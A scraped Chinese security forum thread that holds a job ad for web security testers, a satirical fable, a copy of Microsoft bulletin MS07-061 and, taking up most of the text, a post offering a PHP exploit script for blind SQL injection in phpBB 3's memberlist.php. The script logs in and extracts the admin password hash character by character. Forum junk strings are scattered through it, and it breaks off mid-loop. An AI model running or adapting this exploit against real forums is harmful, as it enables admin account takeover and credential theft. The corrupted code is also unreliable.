最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 绿盟科技
  • 工作地点: 江苏
  • 专业要求: 其他 
  • 学历要求: 文盲
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.nsfocus.com
  • 简历邮箱: wangtuo@nsfocus.com
  • 联系电话: 114
  • 在线QQ: 10000
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++绿盟科技相关说明++++++++++

    招聘职位:WEB安全测试/安全研究攻城师% r+ R  A" h  p' P" |" y1 k1 s# M
    人数:4人1 A/ ]: y1 K% P
    工作地点:杭州8 ^, Z, y1 t5 |' V! b: L) n
    截止日期:2012年8月30日- D) F% O* [: Q) P) N  T
    学历要求:本科或以上均可
    + _  N! I* D- u0 A岗位要求:
    2 `/ B& ~% c/ h- h1. 熟悉ASP/.NET/java/php等常见web代码;5 w# C6 _! b. T3 _: n
    2. 精通或熟悉掌握php/perl/python/javascript/shell等一种或多种脚本语言;# Y" Y, q$ p- U# x
    3. 熟悉主流的Web安全技术,包括SQL注入,XSS,CSRF等安全风险;
    ) S8 a9 Y- q5 f% y  z4. 熟悉国内外主流WEB安全产品、工具,如:APPScan、Inspect、wvs等Web扫描工具;0 b2 c; y3 `' P7 m* @4 _
    5. 2年以上web安全工作经验,对web安全测试有自己的理解;
    ( \/ q" l' A$ ]# m2 T8 r: e. t' J! Y6. 熟悉常见攻击和防御办法,熟悉web安全和渗透技术,能自行进行web渗透测试,WEB代码漏洞挖掘和分析。/ M) J- J$ x3 p! W
    具备以下相关条件者将优先考虑:
    ) B4 Z' @8 d5 D. N1.熟悉涉密信息系统以及相关技术要求;1 Q9 P0 h! k2 \! n" v8 `
    2.熟悉防病毒、防火墙、VPN、入侵检测、漏洞扫描等信息安全系统工作原理及主流产品;
    8 W, o# {/ \3 K- `, \- T1 _5 X3.熟练使用Linux操作系统,了解内核安全机制;
    , i/ X" \. I% @! [% O0 `0 m0 h8 t4.有内网渗透经验,擅于独立挖掘web安全漏洞;# j1 P1 r2 ]4 n* X, g* N, p
    5.对等级保护标准、评估流程等非常熟悉的优先;
    7 N$ E, A/ ]1 o" q" z5 P5 q4 G5 \* f& ~6.对cisco、ids、ips等有一定 研究;7 t. m# w& D, V: S1 G
    7.一年以上信息安全工作经验;
    5 l1 d+ F# F% J3 K3 \8.具有网络、系统安全方面证书。
      }6 B& m% b1 R' ]' o* j  V- H9.有一定的软件编程经验和逆向分析经验优先;& u2 t; \( x: U0 t; ^; h) _; s# e, G
    有兴趣请发简历到wangtuo@nsfocus.com
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    河蟹、蜘蛛和蜗牛的故事
      河蟹:你这网备案了吗?  蜘蛛:啥,我织个网还要备案啊?  河蟹:当然要备案了,将来要是出个啥事,也能查到这是谁的网啊!  蜘蛛:……  河蟹:赶紧停下去备案,没有备案你的网就不能织,织好我也得给你剪断。  河蟹晃了晃他的两个大钳子,蜘蛛慌了神,赶紧屁颠屁颠跑去备案。蜘蛛还是第一次去这个部门,他发现该部门是一群蜗牛在负责。  好多天过去了,蜘蛛的备案还没拿到,去蜗牛那里问了好几次,都说正在处理。蜘蛛太饿了,于是偷偷织好了自己的网。  有一天早上起来,蜘蛛伸了个懒腰,去吃早餐,结果发现自己的网不见了。邻居们告诉他,河蟹二话不说,直接就把网给剪了。  蜘蛛很生气,真想找河蟹去拼命,可是想想河蟹的大钳子,还是作罢了。  好心的草泥马偷偷告诉蜘蛛,墙外边织网是不需要备案的。蜘蛛很高兴,虽然墙很高很高,他还是努力爬了过去。果然,墙外风和日丽,景色无限,重要的是没有可恶的河蟹来烦人。  可是时间长了,蜘蛛又开始有点怀念了,墙里面有些虫子美味又弱智,想起来就流口水。可惜这墙太高了,这些弱智的虫子不知道怎么飞出来。  于是蜘蛛翻过墙回来,果然不出他所料,蜗牛们已经审议通过了他的备案。蜘蛛迅速在老地方织了一张新网,墙内的虫子们真是又傻又美味啊!  有一天中午,蜘蛛突然感觉到他的网剧烈颤动,睁眼一看,一对正在xxoo的苍蝇不小心撞到了网上。蜘蛛已经吃饱了,正好正午骄阳似火烤得受不了,他笑着骂了一声“傻X”,就躲回洞里睡午觉去了。  迷糊中突然听见有人喊,蜘蛛揉着眼出来一看,原来是河蟹。  河蟹在下面指着那一对苍蝇,歇斯底里地朝他嚷:“你看看,你看看!多低俗!多色情!你有没有社会公德心啊?!你这多损害青少年身心健康你知道吗?”  说完,河蟹挥动自己的钳子,把蜘蛛的网剪了个粉碎。  蜘蛛心疼地看着被剪碎的网,心想:“我纳税养着你,你怎么能这么没人性呢。可是他又对河蟹无可奈何,一番思索之后,他和草泥马依依惜别,爬到了墙外。  蜘蛛从此过上了幸福的生活。

    4 V  l3 C9 N+ Q) e% g
    人物:樱花浪子 BLOG地址:http://www.hacklu.net/
    : ]# v3 d2 ], u3 j% W

    7 I2 l6 u  j, Q; e* [9 Q9 G2 @
    3 A$ }+ c, H8 p5 ^* Z
    , ^' s! L, i5 j6 K9 e
    5 }3 e5 l& C. w* m$ B( d. V5 q0 q: U5 n* A

    $ B% m3 k$ s9 _% T$ B' v, D( {" a
    6 @1 P1 b5 e2 U
    ! B; z$ X. h8 P- ^: n4 y# L2 Q5 ^* W  L% ~* u. s; e
    " d+ I+ \( H& I0 @. k6 t5 y
    7 k# |1 j8 k" r7 S; R* H5 r

    4 t: o  L1 z7 x0 a; j
    ' T' o, D' U9 h1 e4 y8 H% Q. F" _6 Z# K. S) l! Z  i

      b" U8 o* u& n3 H) @  D: {- y# \7 M2 Y+ q
    ( F( I# D( \# v: T' y: m4 `; Q

    . z; J, _/ o! P- |6 q7 X公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    已经证明:此贴有意思,而且非常有意思~  % V  A5 a: X5 L& |

    9 k2 m4 W9 Y7 U6 ^. S5 J
    1 ^+ u: F5 e* p! j4 ?4 R) G; |9 I5 _7 K+ \: F' `$ _
    4 h$ n3 i; G( D! a

    2 q" j$ C: V5 m/ y; r; y) m
    : @5 X- P$ @6 Q( [3 l+ A' J* c4 u' X0 O7 X- L  b, D
    7 D$ O! W0 d! g
    + h8 Z9 |3 i0 i) q7 C
    ; H+ ]% _( V7 Z5 `; Y& T; d

    6 c2 `4 Q; v* O  H- ~- H7 ^  \: z
    7 N) \2 [4 D; y- y$ p" ]
    / o9 [1 b' c2 e' F
    . B. [7 E; Q( e" P6 ^
    1 ]/ S7 M: P" ?, k3 T" x
    8 m  _3 _2 q3 W! n( A; ~! M6 z: Z" P( o- D

    $ m$ t0 N, N# I3 b% L' ?! F2 j公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MS07-061:Windows URI处理中的远程执行代码漏洞
    发布日期: 十一月 13, 2007版本: 1.0
    ; p, V# n) v3 X8 @7 j- e
    摘要

    / R6 A/ r" s' M6 O% q
    此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。
    5 p. ?! v: O3 r* a7 P- l7 Q
    建议。 Microsoft 建议用户立即应用此更新。
    % g( l8 _* f, V2 D$ h$ q+ G# X2 H# _
    受影响的软件
    6 z$ l7 [# t+ Z: M. x8 R3 k
    操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045
    ' N& v" M% @! ^: ?; a0 J$ |' Q
    不受影响的软件

    , I: E& V  u5 W7 [0 Y' z+ x
    操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64
    / Z! A! U) {4 Z. W$ J8 L) t/ ^
    微软的安全公告:

    + `  T: ]2 i2 s, `, v$ Y
    http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx

    - S5 B* L* u, K2 W" p* T
    (以上链接均连到第三方网站)
    9 ]: V6 @# a1 j1 s
    0 @4 @* J- s" v7 {. B  p
    # ^- N( l* O: K4 X& G# Z+ m- {6 _
    - f4 S- t3 C$ @& r
    5 }' v  t: M6 q) E* q6 r7 [

    0 `5 H& y6 `5 T3 ]: j$ h) P3 D3 q
    6 i" r& n5 ?% e5 E8 J0 P9 s4 t5 o3 R! T, b$ ~
    : z) {( }& ]0 [0 f) }0 ~

    " ?+ ^' `4 L; w1 b
    & D. U* ~4 ]- Q" Y0 M1 c6 f0 f2 z! |/ o
    9 C; [) M5 d1 [5 b1 a
    7 l6 s2 J; T- F6 U6 w' t7 W

    + z- l4 Y, E8 x- _. {
    ; b: w$ ]; K! W2 I. K" T1 u- V6 w  E- X8 [

    : p  w# k3 e2 y; ?2 s( n! a8 E2 S, ]( r0 w  v% q* \
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    PHPBB 3.0 0day漏洞放出
    #!/usr/bin/php -q -d short_open_tag=on
    4 M# G# Y4 _+ M<? : k# C" u1 m2 V+ L8 b" _# A% f
    echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure
    4 t3 J+ u2 n' p# A. b, h; K";
    # [; ]$ E. P- z: _( [- ^echo "by Hackerz5 hackerz5x@yahoo.com7 y% y4 `5 S  C8 }0 e
    ";
    7 L3 x1 g+ I1 e6 E7 uecho "site: http://hackerz5.com& W; u" M+ {( {& `- I" B/ X+ L
    ";
    ! P1 Y) V3 a$ Z1 ~  L0 cecho "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"
    * n% L3 g: G! ~$ H
    4 t( A: f( y. t' _"; # x5 v) \; X+ `" \3 v/ c) h
    /*
      _1 Q" n' q% sworks regardless of php.ini settings % J) v2 l) u* b$ h- ~
    you need a global moderator account with "simple moderator" role
      G! x7 p: M1 m; Z3 z' |*/ / q& l  y) `2 ?3 m
    if ($argc<5) { 5 _. ~2 J! h# i: {' \3 [0 P- B9 z
    echo "Usage: php ".$argv[0]." host path user pass OPTIONS+ \% R& W, x0 a/ n
    "; 4 I; p; w3 M+ h- J
    echo "host: target server (ip/hostname)
    ; u+ Z6 r: e& d" h6 s"; % r2 S$ P4 n" I! g9 V  X$ G' a
    echo "path: path to phpbb3  p! P/ [0 H$ U) Y3 R* s2 G/ \
    "; & e; P6 T$ [) |6 g- V
    echo "user/pass: u need a valid user account with global moderator rights( {$ @6 u9 G. H1 U6 S( H9 S' T* c
    ";
    8 X+ o$ B: b9 J% y' H2 g7 a3 Mecho "Options:
    # \) \+ F0 N6 P. l"; 8 h3 h7 R$ ]6 j  z" Q. \* M
    echo " -T[prefix] specify a table prefix different from default (phpbb_)4 ^; ]! R8 J+ Y, V
    ";   j, Q$ D  e+ Z2 ^9 P- B* c
    echo " -p[port]: specify a port other than 80# |- M: L5 M9 T' y9 N
    ";   |9 \2 m; |5 K! ?1 w8 |
    echo " -P[ip:port]: specify a proxy
    / Z; r5 d+ ~2 m: P0 Q$ B6 W"; 2 `- `- ?. T5 }3 \
    echo " -u[number]: specify a user id other than 2 (admin)  P& q+ j$ K9 h% V  T+ o% N
    ";
    " s9 ?& y# D# B% `echo " -x: disclose table prefix through error messages8 c+ I: }/ y# k( G; X$ Y# }! _/ i
    ";
    1 P; k. V# w* z/ t. p- u( O  N3 qecho "Example:  W' B# u  g" M6 U2 w
    ";
    8 o0 |. F2 I( M/ R* W" o: H  aecho "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u
    + f$ Y, F; Y) C& |. k/ f"; $ J( k8 c  ^3 b$ Z! \
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7/ x; T1 j6 r! ^- F
    ";
    $ Z* i) W+ w( ~% y4 Qdie;
    0 l# J6 @4 [; D} ' t: w- m- I6 v
    error_reporting(0); : I! @0 Q  q1 P9 B. G. ^- a
    ini_set("max_execution_time",0);
      D5 k4 t) `" z- r# }. Uini_set("default_socket_timeout",5);
    - z' I: d9 Z& t* [8 f& x$ J1 n, ^function quick_dump($string) " y- s- \4 }& g7 h
    {
    % j, o, i! f4 n$ Q$ h, w$result='';$exa='';$cont=0;
    . C# ]( l* @2 G$ a- \- [for ($i=0; $i<=strlen($string)-1; $i++)
    ' `% ~' p2 V0 p( x. c/ ?{
    4 s! u& M$ }( r1 g  w9 k  xif ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    " ~  T  m8 h7 a! J: _{$result.=" .";} * a5 p3 ?# F& e8 ~1 o- j5 O- O" D, x4 }
    else ! u3 D& b# o% q8 A  k/ Q
    {$result.=" ".$string[$i];} 6 n3 T  A2 o4 {% q
    if (strlen(dechex(ord($string[$i])))==2)
      C9 s" J0 g- S. L! T) r{$exa.=" ".dechex(ord($string[$i]));}
    : {( ]: B1 r1 a. {# T& v' gelse
    & |/ B+ `1 z8 v0 ~8 G4 H  d# f7 _{$exa.=" 0".dechex(ord($string[$i]));}
    2 f! H% k8 }% d, c& ]$cont++;if ($cont==15) {$cont=0; $result.="
      u8 U  a- E, I  a9 V6 p"; $exa.="
    4 @% a8 ?  y3 S";}
    1 |! E; B# A+ `0 c5 m1 E8 z; }}
    1 Z% E% j$ `( c% P! h) j4 u* ureturn $exa."& q; i1 b7 r8 O
    ".$result;
    / f5 K5 h4 o# I1 n5 `}
    8 @  l  E$ W" f$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) '; % A/ \. y) R9 E0 c, q
    function sendpacketii($packet)
      j; N$ U7 n: T  {1 |" ~3 G{ 4 q9 Q- Q* n" _. x, T
    global $proxy, $host, $port, $html, $proxy_regex;
    5 [8 V# z/ a1 n) t) ~if ($proxy=='') {
    " c" q) u: z  l2 ]+ ~1 e+ X6 c/ G' W$ock=fsockopen(gethostbyname($host),$port);
    3 W' \4 v/ b' T6 Y+ ^if (!$ock) {
    $ D2 B7 p# N$ J1 L2 i2 becho 'No response from '.$host.':'.$port; die;
    - s/ H3 X# N( G7 g}
    ( U- }: g: G3 _1 ?0 W( ~3 V" U5 Y}
    1 k) y; n8 |/ K' V% U5 m5 pelse {
    $ {( {$ h* u1 ^" |3 b- x- i+ B) {$ ]$c = preg_match($proxy_regex,$proxy);
    * i' H: t4 e1 Z5 O" @: Gif (!$c) {
    1 V- q; k2 r1 ^# a; M8 [! gecho 'Not a valid proxy...';die;
    ; t3 q6 t: I9 Y3 K1 ?+ @. k% e}
    ' @5 f/ j* p# ^: B9 }9 D2 W$parts=explode(':',$proxy); $ V, g) `' R6 _
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...
    $ D1 u! M  R% A" l! c$ @2 G# c# t3 f$ D"; : H* B9 S6 b# o( u4 y% \
    $ock=fsockopen($parts[0],$parts[1]);
    / m6 R2 c0 t7 f6 T& H) pif (!$ock) { 9 ^  j: U" K; _& u
    echo 'No response from proxy...';die; ' j2 Y6 K5 O7 j" l6 g& u, L
    }
    8 O/ @, l/ o( e: R  l}
    , Q# p) f+ a- Afputs($ock,$packet);
    % \% j" M4 a3 |0 I" z0 ]8 Y* fif ($proxy=='') { , E8 m: }8 g7 H# ~' C  j& [% b: y3 n
    $html='';
    " ?2 z/ j+ N  k6 u# Ywhile (!feof($ock)) { & H! q  [, m/ E, [, w
    $html.=fgets($ock); 3 C3 A4 m% i+ u* ?: e) w
    }
    $ @! N2 Q3 a& @& ]' D+ d( F}
    9 N9 ?' }1 U  gelse { 5 h" m* f1 A! E2 \% e
    $html='';
    5 I- z; ^5 \- i9 hwhile ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { * Y! V7 ?. w* b( |4 p
    $html.=fread($ock,1); : b& G3 Y5 W% m" |5 e
    } 6 n' i' z+ J( ?0 ^; @6 g( z
    }
    + P6 x5 O5 Y2 R6 s( y2 xfclose($ock); 5 a) a" C# u4 s) ^+ |- B
    #debug $ f# q$ c' `& e5 v
    #echo "1 H6 L6 v! p4 k, a2 F* Q0 Y
    ".$html;
    ' S6 K0 x2 E2 @# ~* {) Y: Y. n9 R} ! b: m, V: d- h5 j
    $host=$argv[1]; ( b  j6 M. Z6 M/ Z+ A1 y$ ^
    $path=$argv[2];
    2 K5 f, @" m7 a8 a' [6 l( _$user=$argv[3]; ! T+ o0 ^( G; _" V
    $pass=$argv[4]; # _2 r& o$ h6 A, h- _. \
    $port=80; 1 b5 j3 j+ @2 t
    $prefix="PHPBB_";
    , I. `9 Y! A( U  f* A8 v) b$user_id="2";//admin
    7 t2 l/ v+ N# H" B$discl=0; 4 K: F# F1 E- W5 u
    $proxy=""; 8 i  x( p; ]) J& A
    for ($i=3; $i<=$argc-1; $i++){
    / w7 K1 C* E1 z0 ?, ~$temp=$argv[$i][0].$argv[$i][1];
    + q3 I2 r, v, ^4 K! w& fif ($temp=="-p")
    . E3 J2 c& p: N2 U{
    ! }8 H( g! F3 S3 d& Z0 a& G$port=str_replace("-p","",$argv[$i]);   v( S8 d( V/ @5 ]# t3 h
    }
    ( |7 T/ r( n2 Dif ($temp=="-P") 3 Z. Y1 p, s" M- o1 U0 L7 L  W
    {
    ) |& H4 @- D, V1 ]- s& D$proxy=str_replace("-P","",$argv[$i]);
    * U( K) S# y. \2 s0 ]7 J}
    : j4 d) V6 Z2 @1 }+ p& h/ ~1 wif ($temp=="-T")
    $ q- B5 l( c2 |{
    3 j) x- |$ K4 j- r! Z- H/ p$prefix=str_replace("-T","",$argv[$i]); 5 N4 L, s. W7 @. O9 |! \
    }
      z9 A. ^3 Y( D3 Zif ($temp=="-u")
    * v* |& V; D/ @8 p{
    * k1 C( I$ W" d$user_id=str_replace("-u","",$argv[$i]); " S% d/ G) U0 T& j) a
    }
    % H: c; _! i* k. Gif ($temp=="-x")
    ' ^  b( @' R3 i" }/ ^{
    ; I: K# q/ d, M. p" i$discl=1;
    7 f6 \  F  }8 i+ w$ p}
    4 N, _5 u( e- L; o}
    1 G9 d& v0 ?! {2 O) Rif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
      @/ r. B4 t4 n/ c! t9 p9 b( Yif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
      m# V  V0 N  \) X$data="username=".urlencode($user);
    0 v! X! p8 k* y7 Q% ]3 N8 h$data.="&amp;password=".urlencode($pass); - V. I# y8 a7 X3 T8 S2 q
    $data.="&amp;redirect=index.php"; % J! y/ X$ a( P$ p. F
    $data.="&amp;login=Login";
    6 J: i# T- o( I& j% a, X$packet="POST ".$p."ucp.php?mode=login HTTP/1.0; L4 K/ u- b3 X* T0 _$ v7 U
    ";
    * \9 [* b8 ^. H4 j0 ?6 s/ \$packet.="Referer: http://$host$path/ucp.php?mode=login
    - t3 J4 j, R% c/ s0 }6 {. G2 f"; 2 ?" G% m; t% N0 V' @3 M! Y
    $packet.="Content-Type: application/x-www-form-urlencoded
    0 m2 ]" b& r. g4 B7 K( B"; / Q9 \7 I- z  t, P1 [
    $packet.="Accept-Encoding: text/plain7 a# ^) }4 e9 p- _! x; _
    ";
    2 I% G: w) p+ W; y- k4 Y4 T$packet.="Host: ".$host."; H3 F( M6 D* j/ o; J
    "; ! X- w0 W- p, c' s/ }5 F
    $packet.="Content-Length: ".strlen($data)."
    6 C2 h8 W7 G! L7 k2 ?6 f; r";
    6 y8 J) t7 a, H! l$packet.="Connection: Close+ @/ t# s  J6 H% W4 t

    4 @9 W( T; z/ y6 \" q"; . V9 N: F& w0 R. _5 v. l
    $packet.=$data; 4 |" Q' X3 Q2 D2 o! y* s
    sendpacketii($packet);
    " \0 E( Z  f; ]; z/ y4 n, }* I$cookie=""; # W$ X- ?2 p# n1 z3 ~) t
    $temp=explode("Set-Cookie: ",$html); 5 }; m) H: j3 L& `2 i
    for ($i=1; $i<=count($temp)-1; $i++)
    ' {0 J6 k" b( @/ u, z) W{ % Q) G1 h" l# C; \0 l; B
    $temp2=explode(" ",$temp[$i]); ' U) A! w7 ]0 k  K
    $cookie.=" ".$temp2[0];
      x9 v0 C- v) b} 6 N- ~' `9 ^1 o' ~! B; h) u8 l
    if (eregi("_u=1;",$cookie)) 8 u1 T) g" l$ _  m; K7 L
    {
    % h1 I3 t. b7 K' ^4 Z1 {5 q4 m* A//echo $html."
    ' a) X  _( e6 L" E4 E";//debug ( H+ w. a' C1 k8 r: q, d7 H& S' k
    //die("Unable to login..."); ( S+ F6 B4 F% e$ }" e
    } 6 U. p4 d$ Y( `% {1 I
    echo "cookie -> ".$cookie."
    3 `5 G4 v; j/ i) {8 e$ t  U"; . L# N8 m! r* C! O
    if ($discl)
      C! V- F- B. @8 {/ A' H/ ?6 }{
    * z! }; S& D* U& a: M0 h0 S# N$sql="'suntzuuuuu";
    1 m, i3 x- e" U7 Q# d/ Mecho "sql -> ".$sql."
    9 L* {1 U# e& S9 E4 `"; 7 h4 f+ C! d. N% w9 s- U& O/ z
    $sql=urlencode(strtoupper($sql)); , J+ [: ]/ `! h
    $data="username="; ' r8 s" @$ s( J
    $data.="&amp;icq="; 2 S/ C8 m) E$ R! o- ~+ n7 f7 x4 L
    $data.="&amp;email="; & ]1 y8 L- W! S3 p
    $data.="&amp;aim="; % N) Z: k! ~# V5 B+ }+ F
    $data.="&amp;joined_select=lt"; ; V* S. H$ W& m  l. p, {6 ]
    $data.="&amp;joined=";
    4 {! U+ O5 L- B8 J+ j$data.="&amp;yahoo="; 8 b5 w+ O: J1 c7 ?
    $data.="&amp;active_select=lt";
    ) [* ~; i& h5 _( t& _3 }$data.="&amp;active="; " a. t- m4 s$ s, P3 @$ j7 }
    $data.="&amp;msn="; " J" M% ?5 H, p% T+ G& z7 D
    $data.="&amp;count_select=eq";
    0 Y( W' F: g1 V) K6 F& m$data.="&amp;count=";
    3 c! w. O! ~9 h; c4 h- Q$data.="&amp;jabber="; " }! `7 J1 r; p
    $data.="&amp;sk=c";
    $ _: n' ~* I4 |& H' Z' C. G+ K$data.="&amp;sd=a";
    3 a/ _; O* k( p' J0 Q3 [$data.="&amp;ip=".$sql; ( ^& R0 ?- m0 W( \1 ]% B9 E
    $data.="&amp;search_group_id=0"; " }! M5 U: w0 E+ w3 G" K) [
    $data.="&amp;submit=Search";
    ' J# |1 K* }( m# t) j$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
    ; T, L0 Z! A% C: M"; / P# Y' H, I% U8 {" [
    $packet.="Content-Type: application/x-www-form-urlencoded
    9 i( B* p" z( q$ z: S";
    1 ]% {, b, Y. ?* b0 {$packet.="Host: ".$host."* z5 k! c3 q0 C& b; L* J: Y
    "; ' G  z; ^, R4 F: J1 V- K5 y& l
    $packet.="Content-Length: ".strlen($data)."
    7 c. ]% u; r6 v";
    + v; y( Y1 ]% o! F  F2 _$packet.="Connection: Close8 Y* y3 l; s7 u! H& b4 ?
    "; 9 [; a6 Y; d/ p$ m0 E. F
    $packet.="Cookie: ".$cookie." . u& L# M: K% g: @$ S3 j
    ( t  H( D8 P- `  K; y
    ";
    9 ]+ u" E: X! E/ I( L$packet.=$data;
    0 w3 Q/ p1 V. a" i0 y9 g1 a/ J  bsendpacketii($packet);
    7 |! r. u) E8 K' @if (strstr($html,"You have an error in your SQL syntax"))
    % _6 `# ~9 ^" X. j5 u{
    % w; Q% B1 p# s+ _1 r$temp=explode("posts",$html);
    / R& a- y4 R0 |$temp2=explode(" ",$temp[0]);
    3 W* J4 p" h' I6 g9 T# N+ {$prefix=strtoupper($temp2[count($temp2)-1]);   ?/ ~8 `9 g+ d
    echo "prefix -> ".$prefix.": Y! x& s- x- y, ^
    ";sleep(2);
    4 B4 X0 l3 Q+ G" C}
    , {4 Y* e& O( j! `' N$ G} & L& k9 b3 O( E/ h6 o
    $md5s[0]=0;//null
    4 g; z. z& X) j8 c$md5s=array_merge($md5s,range(48,57)); //numbers
    3 R; k* I- v! \+ |9 A$md5s=array_merge($md5s,range(97,102));//a-f letters
    ( N* S# C9 l! t! W6 u% B//print_r(array_values($md5s));
    ) z! D0 i7 Q5 f5 M' p9 p" s. x* B$j=1;$password="";
    * I6 P. ^7 h3 {( S, @1 Rwhile (!strstr($password,chr(0)))
    3 f2 T" b: ~; c{ & z- {+ F3 _# R( v" m: m( ]
    for ($i=0; $i<=255; $i++)
    1 P3 q6 ^' R* k3 o" E( s& G{ 9 }7 N' Q: E9 V0 P
    if (in_array($i,$md5s)) / m* s% z/ {5 O' E/ F* o' `
    { 9 w' w' T6 D  H: K! t
    $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
    " K# p2 ~9 g' T0 |/ [, L6 b- i, Decho "sql -> ".$sql."
    , U. B# l: H2 o! q0 |6 z";   r/ X9 N9 j  V2 q9 d# B3 h3 w
    $sql=urlencode(strtoupper($sql));
    8 w$ g' z- u. r" N. ~' T$data="username="; : ^1 |3 `; v0 s' E( E6 F, c$ Q0 l
    $data.="&amp;icq=";
    5 D% b, f! r' c) e; U9 t$data.="&amp;email=";
    * u2 r0 D# O* x+ M" T$ `) D; g$data.="&amp;aim=";
    7 T* {$ E( i; {0 O! g4 {* P$data.="&amp;joined_select=lt";
    & k3 n4 d; e. z; x$data.="&amp;joined="; 6 v: X3 q; p! P5 p" |* d8 m
    $data.="&amp;yahoo="; 3 ^0 X- k3 T# Q$ j, G. L. \
    $data.="&amp;active_select=lt";
    ) t+ }; Y" D2 L( J# {9 n0 X$data.="&amp;active="; ! q4 |6 {- u2 e/ R/ b# I) J
    $data.="&amp;msn="; 5 S  n& O: [* u. B* B
    $data.="&amp;count_select=eq"; / |5 ]  c! E4 f+ Q$ v5 Y  A# E
    $data.="&amp;count=";
    / \1 s& ?- T; g  z9 \3 ~  s0 _$data.="&amp;jabber="; 7 o$ m$ b+ o2 ]7 x2 @  H+ @+ K
    $data.="&amp;sk=c"; 9 u7 j. }( f# R2 M
    $data.="&amp;sd=a"; / h5 f: [: U  e; G: _6 N
    $data.="&amp;ip=".$sql; : o7 F- h$ U( [* E
    $data.="&amp;search_group_id=0"; 2 g, v3 J4 L/ y; k0 f
    $data.="&amp;submit=Search"; 5 Z. G9 @% c: O
    $packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
    7 B6 M6 ]+ f' O2 ["; % C* o- Q. {/ D4 h4 Z# \% k
    $packet.="Content-Type: application/x-www-form-urlencoded
    : _/ K# `/ L5 k5 I8 R. R( U/ y";
    1 n5 E  n  v, A+ j7 {: j$ Q( X$packet.="Host: ".$host."
    2 T2 c; w$ P; g7 }";   x! q, f3 ]! Z# W9 w( g0 L$ U3 K0 P
    $packet.="Content-Length: ".strlen($data)."
    - U' a! \4 w" E- e; w, H/ U";
    9 E3 v# O! v& j* y" e& V$packet.="Connection: Close/ T, q/ b4 e9 c
    "; 7 S/ c# X/ v4 i; o  W
    $packet.="Cookie: ".$cookie." ' {+ ?: T! N2 G- A
    # r+ }3 `: j4 E2 R
    "; 3 T; k* ?9 n$ s6 T2 ?& x
    $packet.=$data; 4 y1 M/ Q* O! l$ x/ ~
    sendpacketii($packet); ( {9 a2 W. B% B+ S# G! `
    if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]
    1 y, _( T2 w% m# ~";sleep(2);break;} ' ?: c! a* r2 ?: J' P
    } ( l0 n8 r' e% ~& \1 V9 M
    if ($i==255) {die("Exploit failed...");} ( j8 K- g8 h" M( W
    }
    # G8 T# S, K! }; E; Y+ c" H$j++;
    , d! L; g; D6 G. F1 T) b, L8 `}
    # z/ d) v4 J& v6 d$j=1;$admin=""; 1 L! \9 L+ t+ l/ O% F
    while (!strstr($admin,chr(0)))
    4 E" u7 S1 D7 U* E) i' S  Y- E* C{
    : W  j" V5 D3 A. F: @+ B! Y% dfor ($i=0; $i<=255; $i++) ; Q# ~: o3 ^8 ]1 u2 E3 c
    { & F  p: \9 R4 ^- W
